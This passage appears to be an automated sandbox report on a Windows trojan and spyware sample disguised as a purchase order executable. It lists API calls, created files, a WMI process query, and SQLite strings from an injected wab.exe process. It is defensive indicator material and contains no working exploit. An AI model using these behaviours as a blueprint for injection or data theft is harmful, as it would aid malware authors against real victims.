          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/32@1/2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21478C40 GetLastError,GetVersionExW,FormatMessageW,FormatMessageA,_free,LocalFree,_free,13_3_21478C40
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_004045D7 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045D7
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeFile created: C:\Users\user\AppData\Roaming\Grydeskeen146Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD817.tmpJump to behavior
          Source: PO2737478834ORDER.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
          Source: wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833302886.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833302886.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
          Source: wab.exe, wab.exe, 0000000D.00000003.1809268507.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489782030.0000000021509000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809482259.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489600297.000000002135E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809717244.0000000021475000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809608585.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489686837.00000000213E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: wab.exe, wab.exe, 0000000D.00000003.1809268507.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489782030.0000000021509000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809482259.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489600297.000000002135E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809717244.0000000021475000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809608585.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489686837.00000000213E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
          Source: wab.exe, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809268507.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
          Source: wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489782030.0000000021509000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489600297.000000002135E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809717244.0000000021475000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489686837.00000000213E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: wab.exe, wab.exe, 0000000D.00000003.1809268507.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489782030.0000000021509000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809482259.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489600297.000000002135E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809717244.0000000021475000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809608585.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489686837.00000000213E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: wab.exe, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833302886.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
          Source: wab.exe, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833302886.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
          Source: wab.exe, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833302886.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s;
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
          Source: wab.exe, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: wab.exe, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: wab.exe, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834210902.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833469295.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834241522.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833576933.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1833302886.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
          Source: wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834430369.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1835130257.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834669007.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834350157.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834283107.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834350157.0000000004F4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the 